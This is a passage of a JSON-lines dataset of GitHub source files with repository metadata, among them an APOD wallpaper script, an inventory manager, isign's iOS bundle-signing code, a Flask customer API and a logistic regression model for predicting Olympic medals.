\\'.\\' (full stop) in URL o.O')\nimage = urlopen(full_url).read()\nfimage = open(destination, \"wb\")\nfimage.write(image)\nfimage.close()\n\nfull_date = datetime.datetime.now().strftime(\"%Y %B %d\")\ndate = re.findall(' 0[1-9]',full_date)\nif date != []:\n date = str(date[0])\n full_date = full_date.replace(date[1:],date[2:])\nflag = 0\nfor string in soup.stripped_strings:\n if flag:\n break;\n if string == full_date:\n flag = 1;\nimage_name = string\nfile = open('explanation.txt',\"w\")\nfile.write(full_date+'\\n\\n')\nfile.write('\\t'+image_name+'\\n')\nflag = 0\nfor string in soup.strings:\n if '\\\\\\'' in string:\n string = string.replace('\\\\\\'','\\'')\n if 'Tomorrow\\'s picture:' in string:\n break\n if 'Explanation:' in string:\n flag = 1\n if flag:\n file.write(string)\nfile.write('\\n\\n'+url) \nfile.close()\n\nfimage_path = os.getcwd() + '\\\\' + destination\nSPI_SETDESKWALLPAPER = 20\nSPIF_UPDATEINIFILE = 0x01\nSPIF_SENDWININICHANGE = 0x02\nctypes.windll.user32.SystemParametersInfoW(SPI_SETDESKWALLPAPER, 0, fimage_path, SPIF_UPDATEINIFILE | SPIF_SENDWININICHANGE)\n","repo_name":"EChigrina/APOD-Space-Wallpaper","sub_path":"Space_Wallpaper.pyw","file_name":"Space_Wallpaper.pyw","file_ext":"pyw","file_size_in_byte":1930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"19235775403","text":"\"\"\"\n 异常处理\n\"\"\"\n\n\ndef div_apple(apple_count):\n person_count = int(input(\"请输入人数:\"))\n result = apple_count / person_count\n print(\"每个人分得%d个苹果\" % result)\n\n\n# 写法1:\n# try:\n# div_apple(10)\n# except Exception:\n# print(\"出错啦\")\n\n# 写法2:\n# try:\n# div_apple(10)\n# except ValueError:\n# print(\"不能输入非整数\")\n# except ZeroDivisionError:\n# print(\"不能输入零\")\n\n# 写法3:\n# try:\n# div_apple(10)\n# except ValueError:\n# print(\"不能输入非整数\")\n# except ZeroDivisionError:\n# print(\"不能输入零\")\n# else:\n# print(\"分苹果成功啦\")\n\n# 写法4:\ntry:\n div_apple(10)\nfinally:\n print(\"无论对错一定执行的逻辑\")\n","repo_name":"fsym-fs/Python_AID","sub_path":"month01/teacher/day15/demo01.py","file_name":"demo01.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"17853056167","text":"class GameStats():\n \"\"\"外星入侵跟踪统计.\"\"\"\n \n def __init__(self, ai_settings):\n \"\"\"初始化统计信息.\"\"\"\n self.ai_settings = ai_settings\n self.reset_stats()\n \n # 在非活动状态下开始游戏.\n self.game_active = False\n \n # 在非活动状态下开始游戏高分不应重置.\n self.high_score = 0\n \n def reset_stats(self):\n \"\"\"初始化可以在游戏中更改的统计信息.\"\"\"\n self.ships_left = self.ai_settings.ship_limit\n self.score = 0\n self.level = 1\n","repo_name":"wangwenjiezhenshuai/dayuzhou","sub_path":"Alien/game_stats.py","file_name":"game_stats.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"21988444219","text":"import gerenciar.bd as bd\n\ndef adicionarItem():\n condition = True\n while condition:\n item = str(input('\\033[1;36;40mInsira o nome do item que deseja adicionar: '))\n quantidade = int(input('\\033[1;36;40mInsira a quantidade disponivel desse item: '))\n bd.inserirItens(item, quantidade)\n while True:\n resposta = str(input('\\033[1;32;40mGostaria de adicionar mais um item?: ')).lower()\n if(resposta == 's' or resposta == 'sim'):\n condition = True\n break\n elif(resposta == 'n' or resposta == 'nao' or resposta == 'não'):\n condition = False\n break\n else:\n print('\\033[1;31;40mEscreva se sim ou não!')\n print('\\033[0;37;40m')\n\ndef alterarItem():\n id_item = int(input('\\033[1;36;40mDigite o id do item que deseja alterar: '))\n item = str(input('\\033[1;36;40mInsira o novo nome do item: '))\n bd.alterarItem(id_item, item)\n\ndef alterarQtd():\n id_item = int(input('\\033[1;36;40mDigite o id do item que deseja alterar a quantidade: '))\n quantidade = int(input('\\033[1;36;40mDigite a nova quantidade do item: '))\n bd.alterarQuantidade(quantidade, id_item)\n\ndef verItens():\n item = '[ITENS]'\n quantidade = '[QUANTIDADE]'\n print('{:^35} {}'.format(item, quantidade))\n for dados in bd.lerItens(): \n print('[Id: {}] {:^20} {:>14}'.format(dados[0], dados[1],dados[2]))\n\ndef subtrairItem():\n condition = True\n while condition:\n idcomparar = int(input('\\033[1;36;40mDigite o Id do item que foi usado: '))\n for dado in bd.lerItens():\n if(idcomparar == dado[0]):\n subtrai = int(input('\\033[1;36;40mQuantos itens foram utilizados?: '))\n quantidade = int(dado[2])\n if(quantidade >= subtrai):\n quantidade = quantidade - subtrai\n id_item = idcomparar\n bd.alterarQuantidade(quantidade, id_item)\n else:\n print('\\033[1;31;40mNão há itens suficientes!')\n print('\\033[0;37;40m')\n while True:\n resposta = str(input('\\033[1;32;40mGostaria de subtrair de mais um item?: ')).lower()\n if(resposta == 's' or resposta == 'sim'):\n condition = True\n break\n elif(resposta == 'n' or resposta == 'nao' or resposta == 'não'):\n condition = False\n break\n else:\n print('\\033[1;31;40mEscreva se sim ou não!')\n print('\\033[0;37;40m')\n \n\ndef somaItem():\n condition = True\n while condition:\n idcomparar = int(input('\\033[1;36;40mDigite o Id do item que foi reabastecido: '))\n for dado in bd.lerItens():\n if(idcomparar == dado[0]):\n somar = int(input('\\033[1;36;40mQuantos itens foram reabastecidos?: '))\n quantidade = int(dado[2])\n quantidade = quantidade + somar\n id_item = idcomparar\n bd.alterarQuantidade(quantidade, id_item)\n while True:\n resposta = str(input('\\033[1;32;40mGostaria de adicionar a mais um item?: ')).lower()\n if(resposta == 's' or resposta == 'sim'):\n condition = True\n break\n elif(resposta == 'n' or resposta == 'nao' or resposta == 'não'):\n condition = False\n break\n else:\n print('\\033[1;31;40mEscreva se sim ou não!')\n print('\\033[0;37;40m')\n\ndef excluir():\n condition = True\n verItens()\n while condition:\n try:\n idenviar = int(input('\\033[1;36;40mDigite o id do item que deseja deletar: ')) \n except ValueError:\n print('\\033[1;31;40mDigite um inteiro!')\n condition = True\n else: \n bd.excluir_item(idenviar)\n condition = False\n","repo_name":"Vinissaum/Projetos","sub_path":"CodigosGerenciadorDeEstoque/programa.py","file_name":"programa.py","file_ext":"py","file_size_in_byte":4006,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"38283923592","text":"card = 'A23456789TJQK'\n\n\ndef encode(cards):\n card_c = {}\n card_d = {}\n card_h = {}\n card_s = {}\n big_deck = [\n card_c, card_d, card_h, card_s\n ]\n count = 0\n for i in range(0, 52):\n if count == 13:\n count = 0\n big_deck.pop(0)\n big_deck[0][card[count]] = i\n count += 1\n answ_list = []\n for ele in cards:\n if 'c' in ele:\n answ_list.append(card_c[ele.replace('c', '')])\n if 'd' in ele:\n answ_list.append(card_d[ele.replace('d', '')])\n if 'h' in ele:\n answ_list.append(card_h[ele.replace('h', '')])\n if 's' in ele:\n answ_list.append(card_s[ele.replace('s', '')])\n return sorted(answ_list)\n\n\ndef decode(cards):\n big_deck = {\n\n }\n count = 0\n suits = ['c', 'd', 'h', 's']\n for i in range(0, 52):\n if count == 13:\n count = 0\n suits.pop(0)\n big_deck[i] = card[count] + suits[0]\n count += 1\n answer_list = []\n for ele in sorted(cards):\n answer_list.append(big_deck[ele])\n return answer_list\n","repo_name":"MikhailGulkin/Codewars-Solutions","sub_path":"5 kyu/Poker cards encoder decoder.py","file_name":"Poker cards encoder decoder.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"4618175468","text":"\"\"\" Represents a bundle. In the words of the Apple docs, it's a convenient way to deliver\n software. Really it's a particular kind of directory structure, with one main executable,\n well-known places for various data files and libraries,\n and tracking hashes of all those files for signing purposes.\n\n For isign, we have two main kinds of bundles: the App, and the Framework (a reusable\n library packaged along with its data files.) An App may contain many Frameworks, but\n a Framework has to be re-signed independently.\n\n See the Apple Developer Documentation \"About Bundles\" \"\"\"\n\nimport biplist\nimport code_resources\nfrom exceptions import NotMatched\nimport copy\nimport glob\nimport logging\nimport os\nfrom os.path import basename, exists, join, splitext\nfrom signer import openssl_command\nimport signable\nimport shutil\n\n\nlog = logging.getLogger(__name__)\n\n\ndef is_info_plist_native(plist):\n \"\"\" If an bundle is for native iOS, it has these properties in the Info.plist\n\n Note that starting with iOS 10, simulator framework/test bundles also need to\n be signed (at least ad hoc).\n \"\"\"\n return (\n 'CFBundleSupportedPlatforms' in plist and\n ('iPhoneOS' in plist['CFBundleSupportedPlatforms'] or 'iPhoneSimulator' in plist['CFBundleSupportedPlatforms'])\n )\n\n\nclass Bundle(object):\n \"\"\" A bundle is a standard directory structure, a signable, installable set of files.\n Apps are Bundles, but so are some kinds of Frameworks (libraries) \"\"\"\n helpers = []\n signable_class = None\n entitlements_path = None # Not set for every bundle type\n\n def __init__(self, path):\n self.path = path\n self.info_path = join(self.path, 'Info.plist')\n if not exists(self.info_path):\n raise NotMatched(\"no Info.plist found; probably not a bundle\")\n self.info = biplist.readPlist(self.info_path)\n self.orig_info = None\n if not is_info_plist_native(self.info):\n raise NotMatched(\"not a native iOS bundle\")\n # will be added later\n self.seal_path = None\n\n def get_entitlements_path(self):\n return self.entitlements_path\n\n def get_executable_path(self):\n \"\"\" Path to the main executable. For an app, this is app itself. For\n a Framework, this is the main framework \"\"\"\n executable_name = None\n if 'CFBundleExecutable' in self.info:\n executable_name = self.info['CFBundleExecutable']\n else:\n executable_name, _ = splitext(basename(self.path))\n executable = join(self.path, executable_name)\n if not exists(executable):\n raise Exception(\n 'could not find executable for {0}'.format(self.path))\n return executable\n\n def update_info_props(self, new_props):\n if self.orig_info is None:\n self.orig_info = copy.deepcopy(self.info)\n\n changed = False\n if ('CFBundleIdentifier' in new_props and\n 'CFBundleURLTypes' in self.info and\n 'CFBundleURLTypes' not in new_props):\n # The bundle identifier changed. Check CFBundleURLTypes for\n # CFBundleURLName values matching the old bundle\n # id if it's not being set explicitly\n old_bundle_id = self.info['CFBundleIdentifier']\n new_bundle_id = new_props['CFBundleIdentifier']\n for url_type in self.info['CFBundleURLTypes']:\n if 'CFBundleURLName' not in url_type:\n continue\n if url_type['CFBundleURLName'] == old_bundle_id:\n url_type['CFBundleURLName'] = new_bundle_id\n changed = True\n\n for key, val in new_props.iteritems():\n is_new_key = key not in self.info\n if is_new_key or self.info[key] != val:\n if is_new_key:\n log.warn(\"Adding new Info.plist key: {}\".format(key))\n self.info[key] = val\n changed = True\n\n if changed:\n biplist.writePlist(self.info, self.info_path, binary=True)\n else:\n self.orig_info = None\n\n def info_props_changed(self):\n return self.orig_info is not None\n\n def info_prop_changed(self, key):\n if not self.orig_info:\n # No props have been changed\n return False\n if key in self.info and key in self.orig_info and self.info[key] == self.orig_info[key]:\n return False\n return True\n\n def get_info_prop(self, key):\n return self.info[key]\n\n def sign_dylibs(self, signer, path):\n \"\"\" Sign all the dylibs in this directory \"\"\"\n for dylib_path in glob.glob(join(path, '*.dylib')):\n dylib = signable.Dylib(self, dylib_path, signer)\n dylib.sign(self, signer)\n\n def sign(self, deep, signer):\n \"\"\" Sign everything in this bundle. If deep is specified, sign\n recursively with sub-bundles \"\"\"\n # log.debug(\"SIGNING: %s\" % self.path)\n if deep:\n frameworks_path = join(self.path, 'Frameworks')\n if exists(frameworks_path):\n # log.debug(\"SIGNING FRAMEWORKS: %s\" % frameworks_path)\n # sign all the frameworks\n for framework_name in os.listdir(frameworks_path):\n framework_path = join(frameworks_path, framework_name)\n # log.debug(\"checking for framework: %s\" % framework_path)\n try:\n framework = Framework(framework_path)\n # log.debug(\"resigning: %s\" % framework_path)\n framework.resign(deep, signer)\n except NotMatched:\n # log.debug(\"not a framework: %s\" % framework_path)\n continue\n # sign all the dylibs under Frameworks\n self.sign_dylibs(signer, frameworks_path)\n\n # sign any dylibs in the main directory (rare, but it happens)\n self.sign_dylibs(signer, self.path)\n\n plugins_path = join(self.path, 'PlugIns')\n if exists(plugins_path):\n # sign the appex executables\n appex_paths = glob.glob(join(plugins_path, '*.appex'))\n for appex_path in appex_paths:\n plist_path = join(appex_path, 'Info.plist')\n if not exists(plist_path):\n continue\n plist = biplist.readPlist(plist_path)\n appex_exec_path = join(appex_path, plist['CFBundleExecutable'])\n appex = signable.Appex(self, appex_exec_path, signer)\n appex.sign(self, signer)\n\n # then create the seal\n # TODO maybe the app should know what its seal path should be...\n self.seal_path = code_resources.make_seal(self.get_executable_path(),\n self.path)\n # then sign the app\n executable = self.signable_class(self, self.get_executable_path(), signer)\n executable.sign(self, signer)\n\n def resign(self, deep, signer):\n \"\"\" signs bundle, modifies in place \"\"\"\n self.sign(deep, signer)\n log.debug(\"Resigned bundle at <%s>\", self.path)\n\n\nclass Framework(Bundle):\n \"\"\" A bundle that comprises reusable code. Similar to an app in that it has\n its own resources and metadata. Not like an app because the main executable\n doesn't have Entitlements, or an Application hash, and it doesn't have its\n own provisioning profile. \"\"\"\n\n # the executable in this bundle will be a Framework\n signable_class = signable.Framework\n\n def __init__(self, path):\n super(Framework, self).__init__(path)\n\n\nclass App(Bundle):\n \"\"\" The kind of bundle that is visible as an app to the user.\n Contains the provisioning profile, entitlements, etc. \"\"\"\n\n # the executable in this bundle will be an Executable (i.e. the main\n # executable of an app)\n signable_class = signable.Executable\n\n def __init__(self, path):\n super(App, self).__init__(path)\n self.entitlements_path = join(self.path,\n 'Entitlements.plist')\n self.provision_path = join(self.path,\n 'embedded.mobileprovision')\n\n def provision(self, provision_path):\n shutil.copyfile(provision_path, self.provision_path)\n\n @staticmethod\n def extract_entitlements(provision_path):\n \"\"\" Given a path to a provisioning profile, return the entitlements\n encoded therein \"\"\"\n cmd = [\n 'smime',\n '-inform', 'der',\n '-verify', # verifies content, prints verification status to STDERR,\n # outputs content to STDOUT. In our case, will be an XML plist\n '-noverify', # accept self-signed certs. Not the opposite of -verify!\n '-in', provision_path\n ]\n # this command always prints 'Verification successful' to stderr.\n (profile_text, err) = openssl_command(cmd, data=None, expect_err=True)\n if err and err.strip() != 'Verification successful':\n log.error('Received unexpected error from openssl: {}'.format(err))\n plist_dict = biplist.readPlistFromString(profile_text)\n if 'Entitlements' not in plist_dict:\n log.debug('failed to get entitlements in provisioning profile')\n raise Exception('could not find Entitlements in {}'.format(provision_path))\n return plist_dict['Entitlements']\n\n def write_entitlements(self, entitlements):\n \"\"\" Write entitlements to self.entitlements_path. This actually doesn't matter\n to the app, it's just used later on by other parts of the signing process. \"\"\"\n biplist.writePlist(entitlements, self.entitlements_path, binary=False)\n log.debug(\"wrote Entitlements to {0}\".format(self.entitlements_path))\n\n def resign(self, deep, signer, provisioning_profile, alternate_entitlements_path=None):\n \"\"\" signs app in place \"\"\"\n\n # TODO all this mucking about with entitlements feels wrong. The entitlements_path is\n # not actually functional, it's just a way of passing it to later stages of signing.\n # Maybe we should determine entitlements data in isign/archive.py or even isign/isign.py,\n # and then embed it into Signer?\n\n # In the typical case, we add entitlements from the pprof into the app's signature\n if not signer.is_adhoc():\n if alternate_entitlements_path is None:\n # copy the provisioning profile in\n self.provision(provisioning_profile)\n\n entitlements = self.extract_entitlements(provisioning_profile)\n\n else:\n log.info(\"signing with alternative entitlements: {}\".format(alternate_entitlements_path))\n entitlements = biplist.readPlist(alternate_entitlements_path)\n self.write_entitlements(entitlements)\n\n # actually resign this bundle now\n super(App, self).resign(deep, signer)\n","repo_name":"sauce-archives/isign","sub_path":"isign/bundle.py","file_name":"bundle.py","file_ext":"py","file_size_in_byte":11147,"program_lang":"python","lang":"en","doc_type":"code","stars":753,"dataset":"github-code","pt":"86"} +{"seq_id":"12960615924","text":"from flask import request\nfrom flask_restplus import Resource\n\nfrom ..util.dto import CustomerDto\nfrom ..util.decorator import crossdomain, token_required # will be used later\nfrom ..service.customer_service import get_all_customers, get_a_customer, save_new_customer, update_customer\n\nfrom flask_cors import cross_origin\n\napi = CustomerDto.api\n_get_customer = CustomerDto.customer_get\n_post_customer = CustomerDto.customer_post\n_put_customer = CustomerDto.customer_put\n\n@api.route('/')\nclass CustomerList(Resource):\n @api.doc('list_of_customers')\n @crossdomain(origin='*')\n def get(self):\n \"\"\"List all customers\"\"\"\n return get_all_customers()\n\n @api.response(201, 'Customer successfully added.')\n @api.doc('add a new customer')\n @crossdomain(origin='*')\n @api.expect(_post_customer, validate=True)\n def post(self):\n \"\"\"Creates a new customer \"\"\"\n data = request.json\n return save_new_customer(data=data)\n\n\n@api.route('/')\n@api.param('id', 'The Customer id')\n@api.response(404, 'Customer not found.')\nclass Customer(Resource):\n @api.doc('get a customer')\n @crossdomain(origin='*')\n @api.marshal_with(_get_customer)\n def get(self, id):\n \"\"\"get a customer given its id\"\"\"\n customer = get_a_customer(id)\n if not customer:\n api.abort(404)\n else:\n return customer\n\n @api.response(204, 'Successfully updated customer.')\n @api.doc('update a customer')\n @crossdomain(origin='*')\n @api.expect(_put_customer, validate=True)\n def put(self, id):\n \"\"\"Updates a part \"\"\"\n data = request.json\n return update_customer(id, data=data)","repo_name":"Dieform-Automation/API","sub_path":"app/main/controller/customer_controller.py","file_name":"customer_controller.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"29172253313","text":"'''\nCredit to GitHub user Jaimin09\nLink: https://github.com/Jaimin09/Coding-Lane-Assets/tree/main/Logistic%20Regression%20in%20Python%20from%20Scratch\nLast accessed: 28/10/2021\n'''\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom matplotlib.font_manager import FontProperties\nimport seaborn as sns\n\n\n# ! Functions that manipulate dataframes and csv files\n# * Reshapes X and Y files\ndef Reshape(X, Y):\n # Define dataframes as variables\n X = X.values\n Y = Y.values\n \n # Reshape dataframes to appropriate shape\n X = X.T\n Y = Y.reshape(1, X.shape[1])\n \n return X, Y\n\n\n# * Make df even\ndef EvenDF(df, rng):\n # Split dataframe into won a medal and didnt win a medal\n df_1 = df[df.MedalEarned == 1]\n df_0 = df[df.MedalEarned == 0]\n \n # Randomly sample df_0 to size of df_1\n df_0 = df_0.sample(n = len(df_1), random_state=rng.integers(100000))\n \n return df_1, df_0\n\n\n# * Make df_test (X_test and Y_test)\ndef TestSampler(df, rng, X_list, Y_list):\n # Split dataframe into won a medal and didnt win a medal\n df_1 = df[df.MedalEarned == 1]\n df_0 = df[df.MedalEarned == 0]\n \n # Randomly sample test df_1 and df_0\n df_1_test = df_1.sample(n = 100, random_state=rng.integers(100000))\n df_0_test = df_0.sample(n = 100, random_state=rng.integers(100000))\n \n # Remove test samples from df_1 and df_0\n df = df.drop(df_1_test.index)\n df_testless = df.drop(df_0_test.index)\n \n # Concat df_1_test and df_0_test\n df_test_list = [df_1_test, df_0_test]\n df_test = pd.concat(df_test_list)\n \n # Reduce and split X and Y dataframes\n X_test = df_test[X_list]\n Y_test = df_test[Y_list]\n \n return df_testless, X_test, Y_test\n\n\n# * Make the X and Y data frames\ndef TrainValidate(df, X_list, Y_list, rng):\n # Randomly sample df_0 to size of df_1\n df_1, df_0 = EvenDF(df, rng)\n \n # Randomly sample validate df_1 and df_0\n df_1_validate = df_1.sample(frac= 0.2, random_state=rng.integers(100000))\n df_0_validate = df_0.sample(frac= 0.2, random_state=rng.integers(100000))\n \n # Remove validation samples from df_1 and df_0\n # The rest of df_1 and df_0 are training\n df_1_train = df_1.drop(df_1_validate.index)\n df_0_train = df_0.drop(df_0_validate.index)\n \n # concatinate training and validation\n df_validate_list = [df_1_validate, df_0_validate]\n df_train_list = [df_1_train, df_0_train]\n \n df_validate = pd.concat(df_validate_list)\n df_train = pd.concat(df_train_list)\n \n # Reduce and split X and Y dataframes\n X_validate = df_validate[X_list]\n Y_validate = df_validate[Y_list]\n X_train = df_train[X_list]\n Y_train = df_train[Y_list]\n \n return X_train, Y_train, X_validate, Y_validate\n\n\n# ! The functions for the logistic regression model\n# * Sigmoid function\ndef Sigmoid(x):\n return 1/(1 + np.exp(-x))\n\n\n# * The model\ndef Model(X, Y, l_rate, iterations):\n m = X.shape[1] # Observations\n n = X.shape[0] # Types of parameters\n \n W = np.zeros((n,1)) # All a parameters\n B = 0\n \n cost_list = [] # Empty cost list\n \n for i in range(iterations):\n lf = np.dot(W.T, X) + B # Linear function\n sf = Sigmoid(lf) # Sigmoid function\n \n # Cost function\n cost = -(1/m)*np.sum( Y*np.log(sf) + (1-Y)*np.log(1-sf))\n \n # Gradient Descent\n dW = (1/m)*np.dot(sf-Y, X.T)\n dB = (1/m)*np.sum(sf - Y)\n \n W = W - l_rate * dW.T\n B = B - l_rate * dB\n \n # Keeping track of our cost function value\n cost_list.append(cost)\n \n return W, B, cost_list\n\n\n# ! The functions that run the model\n# * Run model\ndef RunModel(df, rng, cop, iterations, l_rate, X_list, Y_list):\n # Make X_train, Y_train, X_validate, Y_validate\n X_train, Y_train, X_validate, Y_validate = TrainValidate(df, X_list, Y_list, rng)\n \n # Import and reshape training and validation dataframes\n X_train, Y_train = Reshape(X_train, Y_train)\n X_validate, Y_validate = Reshape(X_validate, Y_validate)\n \n # Call Model function\n W, B, cost_list = Model(X_train, Y_train, l_rate, iterations)\n \n val_sf = Classify(X_validate, W, B, cop)\n val_acc, val_occ = Accuracy(val_sf, Y_validate)\n \n return W, B, val_acc, val_occ\n\n\n# * Classify winners and losers\ndef Classify(X, W, B, cop):\n lf = np.dot(W.T, X) + B # Linear function\n sf = Sigmoid(lf) # Sigmoid function\n \n # Make sf binary array with data type int64\n sf = sf > cop # Sets sf to one if > 0 or 0 if < 0\n sf = np.array(sf, dtype = 'int64')\n \n return sf\n\n\n# * Calculate accuracy of the model\ndef Accuracy(sf, Y):\n # 1 = True Pos, 0 = True Neg, -1 = False Neg, 2 = False Pos \n predictions = sf * 2 - Y\n occurance = [[x, list(predictions[0]).count(x)] for x in set(list(predictions[0]))]\n occ_d = {1:0, 0:0, -1:0, 2:0}\n \n # Assign value to keys e.g. TP : 22\n for i in occurance: \n occ_d[i[0]] = i[1]\n \n # True Positive, True Negative, False Positive and False Negative\n tp, tn, fp, fn = occ_d[1], occ_d[0], occ_d[2], occ_d[-1]\n \n # Calculate accuracy\n acc = (tp + tn) / (tp + tn + fp + fn)\n \n return acc, occ_d\n\n\n# * Print accuracy\ndef PrintAccReport(acc_lists, occ_lists):\n avg_acc_column = []\n min_acc_column = []\n max_acc_column = []\n tpr_column = []\n fpr_column = []\n fdr_column = []\n ppv_column = []\n \n for i, acc_list in enumerate(acc_lists):\n # Calculate average, min and max accuracy\n acc_avg = round(sum(acc_list) / len(acc_list)*100, 2)\n acc_min = round(min(acc_list)*100, 2)\n acc_max = round(max(acc_list)*100, 2)\n \n avg_acc_column.append(f'{acc_avg} %')\n min_acc_column.append(f'{acc_min} %')\n max_acc_column.append(f'{acc_max} %')\n \n #Calcluate the True Positive Rate and False Positive Rate\n for i, occ_list in enumerate(occ_lists):\n tpr,fpr,fdr,ppv = TPFP(occ_list)\n tpr_column.append(format(tpr, \".2f\"))\n fpr_column.append(format(fpr, \".2f\"))\n fdr_column.append(format(fdr, \".2f\"))\n ppv_column.append(format(ppv, \".2f\"))\n \n report = pd.DataFrame({\n 'Avg. Acc.' : avg_acc_column,\n 'Min. Acc.': min_acc_column,\n 'Max. Acc.': max_acc_column,\n 'TPR': tpr_column,\n 'FPR': fpr_column,\n 'FDR': fdr_column,\n 'PPV': ppv_column\n },\n index= ['Validate', 'Test', 'Decathlon'])\n \n fig, ax = plt.subplots()\n ax.axis('off')\n ax.axis('tight')\n t= ax.table(cellText=report[['Avg. Acc.', 'Min. Acc.', 'Max. Acc.', 'TPR', 'FPR', 'FDR', 'PPV']].head( n=7).values,\n colColours = ['royalblue']*7,\n rowLabels=report.index ,colLabels=report.columns, loc='center')\n \n t.auto_set_font_size(False) \n t.set_fontsize(8)\n fig.tight_layout()\n \n for i in range(7):\n cell = t[0,i]\n cell.get_text().set_color('white')\n \n for (row, col), cell in t.get_celld().items():\n if (row == 0) or (col == 7):\n cell.set_text_props(fontproperties=FontProperties(weight = 'bold'))\n \n plt.show()\n\n\n# * Run multiple iterations of the model\ndef RunMore(df, X_list, Y_list, rng, cop, times, iterations, l_rate, save_par= False):\n W_list = []\n B_list = []\n val_acc_list = []\n val_occ_list = []\n \n # Create test sample\n df_testless, X_test, Y_test = TestSampler(df, rng, X_list, Y_list)\n \n for i in range(times):\n # Run model\n W, B, val_acc, val_occ = RunModel(df_testless, rng, cop, iterations, l_rate, X_list, Y_list)\n \n # Append parameters, accuracy and occurances to lists\n W_list.append(W)\n B_list.append(B)\n val_acc_list.append(val_acc)\n val_occ_list.append(val_occ)\n \n # Progress bar\n if len(W_list) % 10 == 0:\n print(f'{times - len(W_list)} runs left.')\n \n X_test, Y_test = Reshape(X_test, Y_test)\n test_occ_list = []\n test_acc_list = []\n \n # Test parameters on test data\n for i in range(len(W_list)):\n test_sf = Classify(X_test, W_list[i], B_list[i], cop)\n test_acc, test_occ = Accuracy(test_sf, Y_test)\n test_acc_list.append(test_acc)\n test_occ_list.append(test_occ)\n \n W_array = np.concatenate(W_list, axis=1)\n B_array = np.stack(B_list)\n \n if save_par:\n np.savetxt('W.csv', W_array, delimiter= ',')\n np.savetxt('B.csv', B_array, delimiter= ',')\n \n return val_acc_list, test_acc_list, W_array, B_array, val_occ_list, test_occ_list\n\n\n# ! Run parameters on decathlon athletes\ndef Decathlon(df, X_list, Y_list, W_array, B_array, cop):\n dec_acc_list = []\n dec_occ_list = []\n \n # Reduce and split X and Y dataframes\n X_dec = df[X_list]\n Y_dec = df[Y_list]\n \n # Import and reshape dec data\n X_dec, Y_dec = Reshape(X_dec, Y_dec)\n \n # Test parameters on dec\n for i in range(len(W_array[0])):\n W_par = np.array([W_array[0][i], W_array[1][i], W_array[2][i]], ndmin= 0)\n dec_sf = Classify(X_dec, W_par, B_array[i], cop)\n dec_acc, dec_occ = Accuracy(dec_sf, Y_dec)\n dec_acc_list.append(dec_acc)\n dec_occ_list.append(dec_occ)\n \n return dec_acc_list, dec_occ_list\n\n\n# ! Calculate True Positive and False Positive\ndef TPFP(occ_l= []):\n tp,fp,tn,fn = 0,0,0,0 \n \n # Sum up all occurances of False negatives and positives\n # 1 = True Pos, 0 = True Neg, -1 = False Neg, 2 = False Pos \n for i, occ in enumerate(occ_l):\n tp += occ[1]\n tn += occ[0]\n fn += occ[-1]\n fp += occ[2]\n \n # True positive rate - sensitivity \n tpr = tp / (tp + fn)\n # False Positive - type 1 error\n fpr = fp / (fp + tn)\n # False Discovery Rate\n fdr = fp / (tp + fp)\n # Positive Predictive Value\n ppv = tp / (tp + fp)\n \n return tpr, fpr, fdr, ppv\n\n# ! Plot confusion matrix\ndef Confusion(acc, occ, times = 50, data_title = ''):\n tp,fp,tn,fn = 0,0,0,0\n \n # Sum up all occurances of False negatives and positives\n # 1 = True Pos, 0 = True Neg, -1 = False Neg, 2 = False Pos \n for i in range(times):\n tp += occ[i][1]\n tn += occ[i][0]\n fn += occ[i][-1]\n fp += occ[i][2]\n \n # True positive rate - sensitivity \n tpr = tp / (tp + fn)\n # False Positive - type 1 error\n fpr = fp / (fp + tn)\n \n print(f'True positive rate: {round(tpr*100, 2)}')\n print(f'False positive rate: {round(fpr*100, 2)}')\n \n cm = [[tn, fp],\n [fn, tp]]\n \n plt.figure(figsize=(5,5))\n sns.heatmap(cm, annot=True, fmt=\".0f\", square = True)\n plt.ylabel('Actual outcome')\n plt.xlabel('Predicted outcome')\n plt.title(data_title)\n plt.show()\n\n\n# ! Run the model\nif __name__ == '__main__':\n filepath = 'Datasets/Datasets_we_dont_need/dec_sep_MPHWA.csv'\n df = pd.read_csv(filepath)\n df= df.reset_index()\n \n dec_path = 'Datasets/Datasets_we_dont_need/dec_MPHWA.csv'\n dec_df = pd.read_csv(dec_path)\n dec_df = dec_df.reset_index()\n \n X_list = ['Height', 'Weight', 'Age']\n Y_list = ['MedalEarned']\n \n rng = np.random.default_rng(12345)\n \n val_acc_list, test_acc_list, W_array, B_array, val_occ_list, test_occ_dic_list = RunMore(df, X_list, Y_list, rng, cop = 0.50, times= 50, iterations= 5000, l_rate= 0.00015)\n \n dec_acc_list, dec_occ_list = Decathlon(dec_df, X_list, Y_list, W_array, B_array, cop= 0.50)\n \n list_of_acc_lists = [val_acc_list, test_acc_list, dec_acc_list]\n PrintAccReport([val_acc_list, test_acc_list, dec_acc_list], [val_occ_list,test_occ_dic_list,dec_occ_list])\n \n \n Confusion(sum(val_acc_list)/len(val_acc_list),val_occ_list, data_title = 'Validation Matrix')\n Confusion(sum(test_acc_list)/len(test_acc_list),test_occ_dic_list, data_title = 'Test Matrix')\n Confusion(sum(dec_acc_list)/len(dec_acc_list),dec_occ_list, data_title = 'Decathlon Matrix')\n","repo_name":"MrKahr/P1-dataanalyse","sub_path":"logistic_regression/v1_model.py","file_name":"v1_model.py","file_ext":"py","file_size_in_byte":12161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"8492824622","text":"from selenium.webdriver.common.by import By\n\nfrom test_feishu_selinum.page.remove_group_page import RemoveGroupPage\n\n\nclass CreateGroupPage:\n def __init__(self, driver):\n self.driver = driver\n\n def create_group(self,name):\n self.driver.find_element(By.XPATH, \"//*[@class = 'chat-name-input']\").send_keys(name)\n self.driver.find_element(By.XPATH,\n \"//*[@class = 'larkc-btn larkc-btn-normal larkc-btn-primary 